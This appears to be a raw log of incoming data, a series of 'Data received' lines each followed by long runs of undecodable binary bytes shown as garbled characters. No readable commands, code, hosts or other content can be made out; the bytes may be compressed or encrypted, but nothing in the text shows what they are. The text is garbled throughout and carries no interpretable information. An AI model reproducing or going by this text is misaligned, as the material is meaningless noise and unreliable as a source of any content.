Data received GA™x6 !Ž ÝìGŽèìäšJùê.–.xʵæ VÚC[jéúá›*ÿ&?º%bT„)ƒ/ìÅpèïi¥FþÞÚihù²É*‡n? a$0Â*Æ)¶nòQRßØÔAóÿXåàŽèá=,ËúuGà©+¿àË)A“¦ã‚#¢ƒW…']^i&åEoü'OӔ¡—ùñèåÛ;A>ûÿG+iK.@”Üßß/K1ÛB„Á¦Æe怷E{ª@äˆÂºoœÈÒXã“}ÍgzœÏy™aÉãÑÔ2$–yö­þ‹X5îS–uçL5¿XWÒ^úûK]=Ê7 ÀÀß8Q‚oé/©ˆÍ&S>{ã!€Ä Í þ´ñ¿ \m¶3·úWJQ‡p¹61©Ë9(ƒn§ô~ýì5r«
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ÖMRj_V¼'­øy)Ä9ç5‚b~~+ñ[j|nö Ý ƒÀ‚É#Ğ[§Û®
Data received p
Data received ò¥sg£C—ï =àì¦%Ü*dÚn4#Cºðj£36'?$ÆXŠüÀ¢ƶ8ÎEƒFÉŸ¡69éóX:e7ŽMDt‹S*¹„Èڞjœ²Žc•üýðІŒŸíîu4êºãóœmR)ßÈñðUUÒ©£„rõaW°%rÍò礐ŠM‘œ´hõLý¿%ש¹7‚çtz7«ûn;þ…ú¥x€ûrá€Õϒ°Û·éQtTd9æ§ñSCãK­ã×â=§‚Vs‘j«‰ùO¢8•)Íâ€}reÒèAÍîV÷í殨 söj9ª(â%ÊlQt”¨¾bó‚ÞFùøä€/|?®YŽ»éP‚â{JÄLyôq+ÅzTw͆»È$ a83«2Œ… ³ÿjz#IO1ŽAuïÁùöO÷oKГiÁM™#ÜAÇî°I&SöXÔ§±VB_”¹‹H9Q;;˞ïl¶É×6œ5dbö(ðµ¶èAzß=ñ_Dª›NDþº{r,ÍÓu üG[઀p¾PÍIñfò£ˆoBælÈ\Vÿ»úP»ÅOÇM Ԑ šô+²?ÎÁO–ÐNi«RVÛ/‡±˜“3DÌЃu‹rq¦:Iç¬ !w4|ô’7àw1€”Ç°r]ä÷#õel‰knKS·Reòl©ÂV(gãU'gÃìW[ÑMªÇ‰müšocm¡Èî|èJ]µ….¬1FÜÈź€L±£xªX|ªn¦œCôÙøðzaýÈxz{±ãVŠKáAÎQ Â4ÄövJD¡¯Äòú oݕ8B×D ¯ ÀxØDS8{ó1J>»ãA¾ñÍà Àm92ù«x½Ç|ɔÍüŠ¾¨„bÝ¿’Ÿƒ¯yô}ƝÍßx· N[ÏTf•îN>m}àßÚÖgT£»{VHMûFXrVþQÔjekèÊy»fN«²TI¾ ¯Ž~ÏlkBa5-Ó|Àùɝ¸.Ùµ˜;8ºl`”!Ô¨†)|áæ00¯¤à›‚û+gnÎuN¿ ÛÊ ÷Ðfõˆ Õ?Ä*RGJãcgd’Óy³tÊ2™jÇ¢¼Pew±íwà™8Ž;ÜV·Æ}§ê€tȟ—…\m†6iBñÙïš [jÖà J­ø4ÙT£À疸ã²-ÎzÌ¿Ÿ7æä•ÖʘÙ-Gw=NJ ŠÕ€,ú&¨R¨½ g CsdÊjÑ{áÒœú·iüC%ˆnÏÑõ'Z9¤ú7ìiød¥•Í»ÌÝg´p·õóYU_]ƒ¡ç7|¾¤’É2dŒ”†Ñý"2ˆ±S[%·ËÜNm_aãýšÀp3ã9@žHpð@Ñ~ñž#RcÊ·+j¢xAç‘LÈхÀ‡b­¨ÜѾ8íUÃ]=­‰sƒˆ0§œõ“TÂBh}ͼ ž0Œ€ày[ÿùñ;d‘9ÞéðèATÐg½§n‚«ù›Üsö@¡éÙ d½Øªr\<$]óWåŸÕùçF&>êñ©ž#§§“‹•<j§VvÒÞw3ž»ºV¶&vJ =Z^LÀ£!äÄúSäcʯàj¶*ÝÙÂNwï9¯†ŒÈ¯7(K¿Òì(¸®³¯E H’¹Œ›RhYÁ Ýò¹–Ïc ºì´Sº‰­òãÆk›“>URo&9‹Ë]e©_KîPyå°§±QœëôÏ9>xQV8¤Û\¶‰;7Ô".æg3ÿí,G¤ Áэ?-”¼ý¨¸úw,!äú½¿Q^vd !ÁéÿO¾]>/UÒ½—t}¦P
Data received ¶7;+u¼à‘£r§t`o*SÅÆêû—éÓY Ð'v’yXO¯ûÇèE˜Aê ͞Œ3oª˜ùxД}"úÎ5 XdtL?ÛÎEˆlb‡ª/F%q鶏»¸öæ È"çâÌB®鳛÷<}s2$€a;Ì CÝÛ{HÙ Ú#gèDÙ/&¥“]©dû 3÷uîÊÄ#p€j?u‹ G«ªx‰9a¼î䢓{é|2œª‡$0hÂU{ž¾˜Lð½¬qô£¸€Ó7YÞ#¬ù: ¯ö¤ßûe}=½:»' ˆ¨M¼P€I$È%[Fü9«»2ì*xâ³2ÿ‡£WÞ4Êü=ìÇëŽ8c…$¡¿¹qóK‘äÿ»F£=c5Go‡®Nàœññ,ÂօEÑÄÞE™æ—'à¼FsØiÿÉÌîF+\‚²Âp™—iÓo¥JÏ|а«”½=Ë»eð:ԉ¨”ÿíÎÔ]b/8bÞ2ˆiBþþ²æi8bÒ˳>λÒMø':(NíÜûÔ­ _pÓ,úº©þJåI‹ÈcÕ?lVô鸤”k´°g˜¡¦e²„/IwãЗØÍe WMZŸ1íæÿÞÎÒї¿ÌR¾™îæÿî4Oì±{“XƒvɺýÔóñ¨ý ^͝J.À‹N¡]!o弯½Ä=ŠièôLà‚Ê>Åe7Vñ3—!Ö½*ÞLÌXIl3“í'%‰ ~•^k’’”ʶáú6ìKŠ†5³Ûq§,áÙW‚^ü¾W®ÖNFÔm]‘uÍáíÍ KzõWØÃÿáo“ÀA„›óX€{„  ÏYû[ñܭߕòPØ;ݚ®Š†ÆN#<ì?¦T,aˆé—½…0S¯«˜/»C m{XäK¥0B]xTð«:¦Ï§`a‰¶FΪ½©xfø=¹šNÒÐñb ¾ ÷Øë­ô«ÖlÜwú+žx„³laIg:‡ÂØûx‚Ç*Ñ—Ó9d }²?nëڇ“®b›ùUêõs¶þÃSʟ.tÌ'.¹„ãuí`bTíÉ^´ 0Q¶ÒŸ$.XŽœñ®½Iþ>@#³““õ– $ÁŒfà_Åp€¥µèT…ÿ%ÑC^a…e/=õí7 Yg ʾ ‹È¶ˆÚzsŒ$³Iáü+üÕ"½»B߅uýЃý—¶äg)7¡#Ë<D_;­ó}é4ËÉ\Ÿ²¹_ú¥ðF þ,†ÝVuØOðCfFŸ˜1ÿEæ)²¥’ "ñ¿âí qyJ”áõÝY C,'œk¬•Ÿ‰ŽŠ†?=Û¦’Ukhº¢cœ_.ø'mF¸¡ L\ðc:Hă#þñJ ·ã4¢_bþuu{*iÚÕ<âôÁ Â&}ü®Ú96¼ã1)r½‰¨·>ÿpªŒø%4nºÖ¿ö‘®É4§x­Ë¸Ã5Š}2‰ÒtýœÍ~žòäV.›¤Í×,¤OÕåè¤Åk¯WÌt×SØd.õÆNàÓþÏÂx½BŠ&ð{yâšÁŽHXÍÚ båêfûɾÆÐrݵ"÷cØÀ`úž;TU-jÍs'fX› ›·åðL<Z\cýÂÚjêN«Ûò°“ ¸Ý}ÛÀîRöêôâ8¿Y‰Ü0µ¥ü)RzRÅa¢*9Òy 鮇¦®Û{aŽ{D±g¯¯i­s*Â]¨R°cææí$ßÃߥ43¢ͬîÞ ‡3IUî!êM³Ø ±òÇ Ë#²êf@ý±¤3¢ŠÆè
Data received ÀkkT–”{B¬º¬Ã}Ò6ä|‰Y×Ð-;1ÁÞ÷¬2RzgŸ˜ ±û0pÖ¿fÈEĈڑvÊÖn'‰x)ÕmÖ>ÓýZ)è© g­¬m©&nN+&‚a_DZò{w¡i SŒÎ(QFJzwc§Îô?ÙäMLæóµ™5òŽ®æ òÞ! :˜«”üͳïI]·ÑŽRµ_Œu·?³%¦ÓËBŸÙeñ.Vr…ìАÇn11 îRñ0B%|þ³tÈ=#°3deMF‡¨[ñZ†6£W¦ 1˜Ø.ƒ Ôµ¨UiËÌ`/2D$ }×eD«=”òæ@AÃ>±äC\É' ,7——±ˆ¡thèœöì ÅÅæmv: ØFˆSÕv;5r;6}gxö™§;A¹lD+¯;±Bx{ûƆr¢\Ø¥8~ù j‘• ç׌jæâiã£=¡ ªÈš1û\¶ Å·u‘Ë°”ÖœPׁ~Þ9ŸWô˜Ìª¯®qæÙҙOB)[®® Ðn΂¨í–w ®0}|Ö¯••onÍî¼rªW6ïÄuá¦! Ž‘üÏQ"´-zⷙv’ô^²¶ÖãÌk»à÷ԍž.—æ'1þ„«bf¢ô°¥¶âö%œÑ=NI‹J\“¥ç Éc)I¡V° -°(K#ðˆh@dš‹z„8éͱS®8û§´ôõŠ9Zà­@F ŒïÈÅhT@2š@ÉÐø!ôZʉN˜7Þ"oEEÏ~óUˆÓÞ¤qãMßE“8ãM Ð"dBÔƦ©˜ìÀ=]ÛgïºÄ;N„’¶@'§Ì[¦Hñ¶0v¨€iB¥ÕÁJ(M¤‚|aÀz;5ÏÈ5*ö>ü³^÷Þ*ç § i¸/#sޔN \¿èwY“Nˆ€9ÛÇ´Æ‚Ä%‚(Ó ø™íW4~üe× O·ý*d©MHáÓדšÃ!¢Ònû¡ÓiỈÎ_a!^Uµ”7õóñð!Øon•x–ƒî¶æû•~–0 bû v؛DV1oՂžrpíÉòèú¼¾Y•¿w`"ÎøA 縻å\Ág€UMŽ”³`ÜEà#dÒ½^ÿ6mJäÃào+én¯ý†­¸Cψ¥Aەõ·Z€Ó$ùæ&š…©f™–›©±,pb6»4ÕOÍË^„£Î{´©ÁuAÈÐa´¤5w…ÌtÝùÆÛüÚËO… -l± Vó³ŠnŸe£–Ä”èEC&aɓð{©yKр¥›âf¥Í/rÃCZŠá‰ü»ïA¼#òà‰ ÍQ5ž “Fãe~¾öœ£'3¶Mr’ñ *òϬ‚Ÿ3Ϩ™|ê*üJI× Ú/! ‚æJÈept˜¿i¹‡Ei³ +ƼøBÒ`YÍ7À•®ÉèÄ\Yx«÷gÑ_gcw¿¥ûÁŽ˜6͔ŸLLT´µÖwÐ:ӝÜ-5ÁÂƒ6­|hÇ_sâ¤ÇN䍶°ÙçÖ³ß;6^EfƲiX—&?ß? OdܒÄê r¥ï.ù1Òí±ïã‹u{4î‰û}b{¼ ¹ÆÓ`$÷w¥»P_ñS¦‹Wœ!ümtje]’œŒÀSÈóíºy·/åM†FsÐï† Ÿf²‰aÀzIяk7ԍtݏ'é…H¼l]¥cû“ œãä stÙoÔèi³þOÀt³§›ÎΎôI¾AŒZ¸md!ãY‚–.^¬Óæ*ôꢧjµ®Gf]…Ÿ»ÃÅghd* Áz² a…³\®zµ<
Data received 9‘õ²6¥à*_Èl«Oç¡q³ÔD•ö¸3ÞÎ2n´TSñDvì¿dŠ•ë(¤‰q֖ZæÆoZoÏû^㿤´7, ¦ââeÁ![¼–Eó#¶“ÕˆdZ‘&¼Ó‰ kþ¿Úv.ÿÀ£ñ½¤“zA; 姠ºþøϓl•¢˜…˜||È·J­èö`¦"Dõ#n•êh×é¨ÄÅNŒqd(b-¢Ô|°Žyz¾…*¬žrÚüß«™fåe]yñ|äb¹ù'±Žƒ­ÑҀA­ÀËÆ&–U”·EÛe:u€âV/ö¤g­XÂð"Ԍ6­ƒ±Hª*®C…T´† à<´jT¬žÆž2ä‚>ÔÀfp‰wîa¢gr½‘è¹M—'’55{«f~êÓËJ$ ®Ì/Þ²Í)(ىGqs_M…HGܤ·IQQ!³NìÕÁþxXٔ~Îਃÿ£:~¾Õ¨uµ˜(wv”W3Ô äç@)$ª|fpó-„N¶Y 9"Ú ]ÎÕÐñŽ‡Å¾¦œN`•^B¡8Uë) ÷õ:UßÂïÿ SGÝÞ´ùP~gm™ätû?ÛÆå 9å nRBJUsÈ*!1¾B‘E÷ !·áEâN™é¨±±†ÄzãRHì#áNHÒ]]tÖÆA§ÖЁ‹»W1¦8 æI/¨Í—“æHÊ ùžå™¿dEŒëêüq ìNx…Ò[ÿ5:܏ÐÍåíÜ°ïáø<GN&œm¡ Ï Wëã>%'è. DJ"ô¨5=&h! cç6;ð‡ôæ¿P[V i®nÁëè åLÆÅɁQÎêIB) —ñ /ý‘íÛ¢j`„?QT¢âÄóï¬ÃÞ¦!HVßÈ´t:„¯*w¡Sæ'7#Yu?Êöª¼”&Œá<ÝûŸ¾Dۏºœ±DÚÙ?(ÞÀp˜Q0Þ땿åè혨q4V¦ËŒÚv kܑö¬xþR CÚ±A‚Ð\ƒÏ@Ž §ªÂ™/‰8Ó2}Á_'}.®Î8÷åg&o†øp >%ëy/¨1oE$VZ°Ép×ÓYb ¤Dö,¯(†Tþüàdd*Öµ–ü`ÌŽwG‡‹û'be×ÅhWÒ ¹BE1à™$(áÀ¬&À „K´—ï€wùË_5Wjƒ„)l¥Vo@7 ;y^õ\D­ˆ£_\žDñGW`ÝTC%Önq>éǑd··D%$J„Ñ*U¼"!¨iœÂ¤Zæb æßc* Ñ]Ð2!j‡o”ŽÑД—KŽ6ÓP‘D.Âc!]¾¢<÷4 ä<V–ò­“‘V ÞG̽Ž?·_v…Yœ®0IԚ ›£ÏtŽÞúÕ5´tQ¾/VÞ§ÙôÎ^\lÂÔo>f„«³¢<ŽÿÍ©”à¬Þ¢»P7L-ó‹—[#ÕßÁ± …÷±˜?8­Uÿeòõƒ®O ¥Ãhˇ9UF¬BžpRõnÆIƀ) kjø 9ꜹÀŽ¶³›°aZb€l28Qñ{Ç6€¥Åø§8^îÑTÉø€ÙŽ2å[§šP{¾2ŽÌP3 &aÓÏB yfÌü¦)¿å3cj–ç‰NmµË¶Qڇ¸tQW¡–+ýãF8±S#«T ?9Vïw'ˆi Þj ³1ä”b9A…õ=蠩Ͻ÷ýÿpµ’¡u-¡g<s®ÒèëŽW.1öyÔíÒ·«> ôlªïÃÖÐZ²ÅpR¦U÷¤ÝçRÑLsáEƒÝëÈte?‹9Îw1,¡`¡SÏùgýû“r—‚WTä8°ôwb… ¤»•
Data received ŽNRtQ¹\p°œ³¢ºÉÉ¿¾dûIÑ|´9=@ {…×øßýQ²ï_0\‚‹ìDž¬Yï’ B§ÀciÝbøÝ22Õ _YƒŽøH|G\v‚¿¡Êȹà¤g ò‘vÂd׳zz_ >CUhn!9v(î7;©Sz)Të(ÛìcÑÒ1Jd¼ßüQ$dèèã©Ë˜5áð0ãy}æi‰;5 ¬8kÀBl‘~~ä{õ–^›sW6?¯cÊ5½pI‘ÁUŠñ§!ç•d—„ãO½èæò¯†‘¢ît¶ÝIäìŸÌ1;Äy¨ÜÚó”À.á•uá¤äq0È'¸÷&Î*r\¦³Ò Qi¦µ²Ñ0¾‡÷…r(”ÌàêîJƒòg ü½f%ï[u]CV|Œ¶a–•^ZÄD¸KŠ!’TØÑ  q)@ ¶¯-z:AÐ}êK&ãöEË©!3Å$=ÿBº¾ÜqOxü9¡mÉ¢ÌnCŠ–%¢".úÙ*DŽÌâÊ*÷²™Íè-ü*#ySdè6àóc…g™Ýù_Áևͮ´.¢êRׄõîÃ^ iBƒÙ8OýזIË¥ø€H §É£e÷ €"¦ÈÝZ2¢(ž|‰š_ h†ž3Ž†™-Í­Ê̆oHðKïL‘Nê*i¬ëYpÿ#xÛs «•–Nx<d=ùø­|·$‘c¿ú QŒ5Ð'\ óJ§q—•{û¯8¼¬˜Jg´ö^WŒJP³}jήõ‚5ߦ[¹o¬S~æ±{rƒ‡_–½âzz‡u&›ÔR 6ÞdµÔ,é3§þÐSIÓõpHjK vêG†€6’˜!PÞø͆yQ©´³)s1üߏĬFÅÓ#÷#äº »[”8B,b_gV[‡Ïû”çL§4ï毞H²;HuK`<(ôÛ°² *pOgËÂ7þ¼¥š;,WŠMŸLû¨WäY@Lºrþ} ¥HÓ«4õånÀ(µEQm|>úÔvՏQ¬o,Ô(¼²Ôg±éL½¡Qv ×/(N>Ÿ>#ÙåÓl¢X3A&DÁ°BüÀߝ+NDN„´î¡T¨^vì¾Aà£ü>þú&_u+ñQ¡“™öK÷2püèš«Ä® ØZ#v£…%WÑ#{%ÞÂÏësK6Âs›ùp×ӄ</­I£A")FÒUJÄEäŸ+I6?#; jZ¨sN9œ5.°¾ë-ŒI½<Ç`ÔÀž7zN»¼n“ÞaìEœŠ´®^ÃçÚ<óóàÓ$á8·ÖŽ©‡uÀÙb®˜üñ×všøy~³~¦)Éã K†9;îÙ­9旚º­B¾Øζ‹sÚ¾øµ²Ádô°‰co¼VEƒþ%‡Æ–^=ÕéB™#È}Éž ó)_˜šý?h B?LÉ2|wNc»èìBÔ1é©j^ÜD§_åBE£sç£ÏÔæ¾vñìH*Dm=ŠæÆE½·ˆßìÿÑÒÞÌörHƬ ÷ŸG(DÕ0#ºö¤UÂ֍Ç'_ v«ÞÔ¶Õ>²Àãàÿ‰ôI¸Ã=ŸÅÉÐüìïЎÞmB­|}D®½P|Ӓ.ÝHAqò¶cH:éøûÄ¥”;ÂQšÐ%oà’Tëø:N=¹ÇÍ#*B¢¨3mçL:²Ö¾û(C«ÁoPº å|ë%%”þKMn“q%¼nÂ¢˜’Ð>E$ÈÄBb¸ò„;ˆfzÇB ±+ðÚàoôYý;× ãü¿µÎQÔ@h,&Ϻz¾
Data received †…]èÍÚ]wjî†ßx›nôÀ çs@¹——§ø!­Ìú5éFl䮆Äq‚k«¨‡útîý$~µÜý –"¬|™Ïxäôz’bÜ£Ð'¨0ÙÏzGä~Œ4;öêB5²~~™gÞd[ýœ~ÛéEá[—¼#ìò
Data received Àll#Ë tÁdI=¸‘­ jëӞQîÔ±@Uø-O’œ_xöŠøàã¶3ž/õ¦Vßõ¦Õ&ýR#(Õs,áQo>¡ú<dAß@4dj¼{ù„È…ê½¹ ŸîØP‘ë¿bæ+3.RW‰Å@²Å©f ÆɦRwRÓ>NÃÂ% M²ª·Tàÿ-°¦;Fwܺd9‘éÅT|Ý.evpx¹ÉÖ×u”xÜ.qöƒiÛ[Û=¤Þü»-/+~/Ðe¨>“ Uµ4BB²ã'·#ñùUà_„c#öæ”Ó•×C–@ó¸-úùª~9ï³mq<m®bé?ƒë^ÌkµCU?¬É¢ 89¶sÞÛö}0\öð͕êø¡Ü"tÅ€á_\éžþ¹ø-É¡Vx±ÍΞ¸y‘V á¡öSÊ#YÐ¥ì6¶µÎæ>ÐEcÍ?ÿl„ÑÓ,AzÌÍ íû´ÇØ13Ù¿Ó@½‚ëÃ7Y—IyRÁ+kÁÜíyXÚ|=а/|Ü¡31†«ÕÄd“‰€í çp0ŠÓ¸Dáï'á3ÿF©Æ"ïÁQ%ѽþ~(Dø#u•Gú•¾œ¿¢×ŒéOϞǙÀ©vÏî#•F—ið–WÎ3I¼M¨à&²,Äqs_eaŸ32ëîk“ÉäJʖPp‘O‹èaË.Rþ;4!–ð%ýùêsZ Äfƒ?á:†;j~~=t¼Pní$šhC¸ƒ¬c¶®!~ð…v!{mÇ[öëQA…b\¾£¶M%zãîk‚¹{³Z«$P¦Ä½Íҟyî7FXÆw{$nµ¢‡´ó”Ÿaø)b¢Ž¬ëUö~‹¬¤®~;4›n~ ÜX8xû€ÏaíΌïè ø-ãÃ9°jèk"n•«¬®%ÞBS(Kèi,̖|ºFÂ&qXìjƒ*’’œiƒë W8«©Kë:W¤sä&ÜIâ‚N¨& •w¾iÕcõş!C`2œ÷ #hÙËÕµ\­Ãë°ûŽ¸ý }¡ÜJœÇ˜.‹É¿ e»B­‚'`ûÊà4ÓæIȬC†0³~Z­ïr : þ‡WGä,þûð³ÂI\ðõl­¬¸@μß6€»×ÕçËÊxáô} ãa²~c”(O…kÿ§ú>Øú“uMT\u+H k°…!@šgnç'â*E4Èv“3\q%\Íïé_èÆvi· 3“Ù `€*-²·pÓlï|¥¸‚Ï›Õs‰pÕ H¼¹ËÃÊÞÎ#kƒ\pÄÜZG“Ü©#èmä,ûÂ<EMPz€1–L9´Šà_ç,3–¬]£yw]›ßüy5% –C'bR\b Ž•' Ô7:ô ðéÌEäz}Ýþ<PJ› ›9Ÿd¤¦rW¦D=æ÷㚢\Ž»2¥£S-̜1 „£Èõh©³KZ2f¸x’ìv¼›0+wsai(¬ •_k%¾*(÷õ@,møªà¥”Pýœ$k(µüKAÅ[×U__{0buâ^ÇVö)å£Åh©Á­83%ƙ}y¸ð$ /j~±º@yìžê‚C¿c_—¬jwš7⛇ðh5Ô Iê\RÔD{뵶
Data received èóô… TV@ûm¾‘6B´©†ü4ð»çÎ`¤b»¢0ê·5 Ý«Û.J QX‹^jK ˆ^e`{†mÕE÷lcu¦3àXŸ&ù<± ±\îh‹Ëƒ äîMӚl´’W퉗ÅÔ:€®¥ïY]1ÅÂO+-:É(öÃ[ 2eòx½—U€˜6dhÐÔnløY$PRs¹¬Av‡îo9¦¤+¹ò̳ýÅCcÉëO½Â+¡ènØ /›¥…L©™¦Fä× ÆœÐȒŒv…7œk¼ÏOQýŸµ…ë ºŸVb 5m¸Ádï1·OÜs®ðu,ï wQ†BJO8¼Žõ§¿¤A›©_ŒÈ»§[Œ¿àSD^ÿ6YǍøµÌûmgFIO¢= ý!PíŸSÌi•‹IõÊy¨‹×$Z_*§_Þ7£šßÿÚ¼æQŸ–Æ팶÷ïk†+Üep¦ê¶Ã‘ºFfôUïM'Œ@«DÖ™jÊ~àh§ý&1;A· ‘GÕ|Daš ÛÙ­xŠé<l<™ŸÀBaü…¿ª¬ËÙÇ"‘­'Œ7ýX9¼Ê›òUÛBýÚW .ŸºR†ÄœáB:áÞ!˜)ºÍòNúÒôl'*Ô®QzwP©Ì«œ° )ëùGâUãö@'0ƒJG ‡G>x}µ~žÉ(oĂáe…H öA°%3@é?V$b`¥*䈻‘{×*½€ÃÖ¾»*°H¸,iC®‰$¥.ìÐX%âIá &Nkˆ¿ÈˤwÖýópT§wr¶rŸr“КÒqÓÉØó`ù ̍S[èêšØ´zoÀ¹D’ð(…ö³Ê—×3l;œh†Okʇ˜/׳–ü­@£,–ÆĨ>ñsßµ¾ôûd *ëTÓ­ò! Ca‘¿ÓÚeµ‰>©G«ÕŒ˜ÉuqNywu£S¼Yʐr¶¥¬V¤&öF9Þ³‡æՀ³~º¹¢ZŸ’Ø5XÓ`©Ä*ŠÓº8͉^¤fkbw £rê©®'R:äkbŞÍåÙN0À@!­iP8åQȉÔýŸÓ”zvÔ8µC×zý¦¡êh :èf¾ºYm8½Ð2È:7(°ËâHöK¹a_OƒèUÿì‡Â· i`Mˆz+Ê´!Êëˆ)©'ÍS÷çŒ6ô ¸½ŒK¯3–KÁ^œ×ÑOÚm\Q–`C]uB=‡¥×® x=\ƒ“©2SžßÃsÎ{ËO‡õÃLÈÂm`øÍ?%=yþE$%…²f‡¦‡±˜öÙӞ=e2D.¬RæÞûÞgt€œ4ȼµáC®ãwäD⊻»æeùu%^Wþ©$gÚÞÎAþÊJ3êpÁ‰‰^-b +z’Ñ·.„<µÿ°ŠϨ™kÖÀ0û€w®Q?¢Yä7›nl¢Ÿ5îrõÍäJ¯f†˜¥Åa¡$ç»=ù¯˜Ói[V鳃Ÿ‡sT¶½Ã§\ãî›<¡ß-ÊCXW¬ÈêÓ©ÏÜYù¯F"Œ'>»Y5pWû” à)÷7¯‹?§ Pà֏{Ä óËí¢–¾º’2/׳匼Ê>UPÜ i/¤§ £à†ÙÜ[—‰ý»›cæWÛ<ÌÀåò ãÛ?槇‡?†Ð/&Ӎӳm|f°V†NRø¢6—¸ƒI.^½éNáeúëÀÓc±õ鵶÷ÛD͐?¤Ñ«é1üs´m[“tâ>¤OeÌŠ:§pRÆ(‹¸yŠò6Ý4DnšçÛHŸ#›d’ÏO²ØН*RÈÝ-|Û!²û¦Ü‚oØãS䞵
Data received +iÀ»JslP2™¾l…wbóR~êæ¯â¥ª#Ì:~,WVM¥I8nyýè7Þ|Q•(ƒ³‚‘qLÊOZV%¡{eq^†4riL.”@ÙµÖ}±PeëþYI1¥AÑäDž;Øë~oEyö²&d}ªÑÈ*è©H †UYBAÁJn&2ðõàN‚¾@ùx8œ(SHà°À\þ6n(—5ÏÑýÑäõe}ò¹o‘*,”-•p¶ë)£ÿ[‰°Ÿ>¢¢µj£0 v@Œ³³Kh³{¿ãÈorîRWg¼ôéiã9܎ŠºÊdÎ\dxÎM8:X‚l¶¸Š]ï/¬˜8g±z% i® ðW'·¹"ÇZ&¢/«§©Iý©pWäÈ<·‹îñfÇ8Ë3á ¿Éçz)mwE*ݽ ®ònN@w#1ƒªó…üÝ/½ˆa«|tdÁ;s Ÿ…ŠéÔþß ºGÓî]Æ»{Læµ0{•Ö6¦M¡h@ Ð-îp+‰^Iæ²i(Wáà Z×æÅf1ÝâŽm<@õZô†'PÆ£ýàþ{ýj”¸ØÉñ¯þç »ºµ2Y1È÷+cÙY:·~g¢j"'•-g&¨VӘ³ ±dù˜þåÿÛìD6<ú/¤‡eB€õE·jæ äð+:ï’×/®ªZm­Øâ–2 ‚m„úˆ|B£Ð-E3K2Cù †AâSé™AcødÆvÝÚ³“»Á<~=œèÌ¡=,ãó›–¾:æ<#2Q\œ*@á\Z®ÚŠ²ˇÊýRtÒ fPà-œG>Y‰=}{ûBXÊT7אÕTÍç6_Ú¡Ò®@ç“H“øñ•!À¿½"¶&­Šn”hëj!fÿ¸–Š=ÆÞu«Øú«¹°w)î n §t(Ó]¹í7¤I£¨S‰4AbK|ë[>K~ òªŠ å+„9iãʬ6 p¼ho¢i]´_$ˆÐэߏ€¯ç£}_Nèù‰ ƒÎi¢¼Ô%¶j¶Ž™pȇ7 wñÏ}.hÃLIŸb⪾mF<ä‚^Ø<'½…íþvB­(“0c­¡z—*Åé§üÚÔ<SÀ¶§D0.Œ‹ËBsàÇK…aÓòçÎÃñ >°¹Óýo6¢f½ÓB{˜srÐõû¢€(_Çî´Sƒ„ò9@ˆÉýlß?3ô~{$O9JIߕ7*»ÌÝ ~9¨kÕi6K-sôH¡² ÷æ„>n6Fv+uãoÒ"ýQF˜.µ‚)uöÍ%_DEL%ސn£ïù(ýM$z•òDH}¶‘GÜF¤"Õr\WàûùMh´@ðvÊ9Ç#þaÞC‡r‰'$|.¶í%mJ!2¸Ùï ؒëǎÞò¯8ÿ³ÁW_êqÉ CÐòŠÂU;X$ýÈÓ6%±¼F¥Ûý­`—„¥ bX6‰щkÓèxbÄ*õ«uAØÎð®qílÝ #'Ö (3"?ס:,¯üŠjøçºf9ܯÜ5[ò§Ÿ±‰û åÜL!mï¨ÙgˆES ƒ† ,jvᱟþ_š*;v̶½ë8Ôói,X2‡ÓôƒbJfßZš ˜¯‹ŒÇ"= .9ì}X®àøJ„QܚÞ6N^Öxñ8X=xm¦g\»ïJ’'™ÿщ8žõGÍ<sÛmÿ¨ÚCÜdÛ8¸ÀÔXÂçSO÷2vНiWG$Q  æâ±jOH‡îåõš¥Ææ/@ ½ Õ¤ßò¹ô§øµ~/zmÚÚ"¸$=É@>(åŠfK£ÿ~üul®–æ~Ñä¹_¡®ßBP‰3Ãx„"›ƒ
Data received ÁÒu”ése‹ÑNh]?¢k˜/Ï'8§3?@û¹ ¹:8éñÔ{Éi)ª¢Ó¥y\cJjöÓ$ã6$þIÂ[Š¿¨Ä:íiˈíWÊÞtaaÄ3'¸cn×±ò×íÂQ€|ŒÞÛõËĵ¶­r ÙX>ÿȪÄkÇrÔÅ d×|mß\°Ø zƒF"ÅÁ’:otRL&A>a€(“ûw+GÆ×ê]<UÏ!¿PJ±hÍýi>Ä×¥q3PÚ-ñ±½ðÔæ µÈObùsè Œ¾i‰N+ó¥Ž]‰v’2x˜  ” 'M_±à9(pÚ #˜‚,_®^wòªhê6LÛ*4¢ã;bºžAäèOß~lpo ·0´Ñz7j»aKÍåG0µ[ "Ù*?±«"dŽž´Ù¢ù_ÿ¢'†ÿÞR9P_œú£u:Æ (ïXz3R«\¬’¹ àWÝ¥§†–(%Tn&þzþ4 stìC6¯|^¾½DÒ!Â^Qˆ|=%<v Ÿ=ÃXXãÞp,I#`äawþº§4^!K&‰Å)K`ÖhVyTqw2ìÜï¡ ¸Ôù*Ñÿh>1ŽëX²!´±]Ąè¬BÛ%›NªLÐçP:³üîú%2ó%¨X”C¥QÏ´ {=Kñ;ŸŽßS7µvû ӈš¥ôÖ: ¡hÒè^¢ÿ1ðÂî91òm‡Ì~ìߣ7<Å4ƒD‘šåOÍ]]!©ì±kn ÕLr¸j…þs%Ü;†Î/ý÷Á…\Ïú %܁nQÔ×<ª+ŽÉç€Òtì¯Ö<j9#u„* ll1¯ª Ã+eì_žMZž`»ÿU·¤‹6‘ùFceí»B®Ê€–s&$kä«I Ãʙê´L§¸¥?.úÚk©”Ê9DJX`(÷‰&hCäéL{ôžœ:6t#PSýbó§ƒ'1ßÒd®s7|¨†–BDgòa&šÎp?»I·:ãß^ pqS^Þ`)€˜¼|½þR1zõCå鈒ž<µª¤i†`»‹ÿ¦¤Ó2¿OËoºžiÒK䃒ˆ_÷¿! Æ)Ñ{ϙºójû'öß5ß?ýõÑëPhöžêdƕ¨iù¤Í—ÆÀ¡¤ú ài=j¶v±MõE†üZ8R+x\œh,W& f¥A3#´}0Ł5âà ԉ%ć³Â!üȑjï&iPͯZ·¥îd•v‹–§eY•Ø6•#6›Õ–cqI¢Î/ç mԍ—Áàj<AÂõ×H´o'DûêbÜ)è£#7„ˆ·^’yÞ (>ÕÌAu·¹ÂÛ§áËm– üÉk=#N^GØ­’À®5^Ê e,>'S‹5ä <×b  ðzb¸ÁÀ‰ç¯=Pwo°¾éVœ7T[ùv4X»Rlú;FB4Táëý#ôÝGSœÚOšïÞ3Mff 7&& õM¸=PŒÒ¯ÜS+[WĽçã $„vªVºŸô|±Ik‚êüÍÑJe´bN°qÝ3“º\î+ç‡-äÿPgT¹Ez΍™q""^/ ¿j¼¬BeKšÊ×ÎdCSÆw2#T_Ø÷lìè!yUT{ê6iBýx—4Q>l¡(š¤žm¸˜dõ# 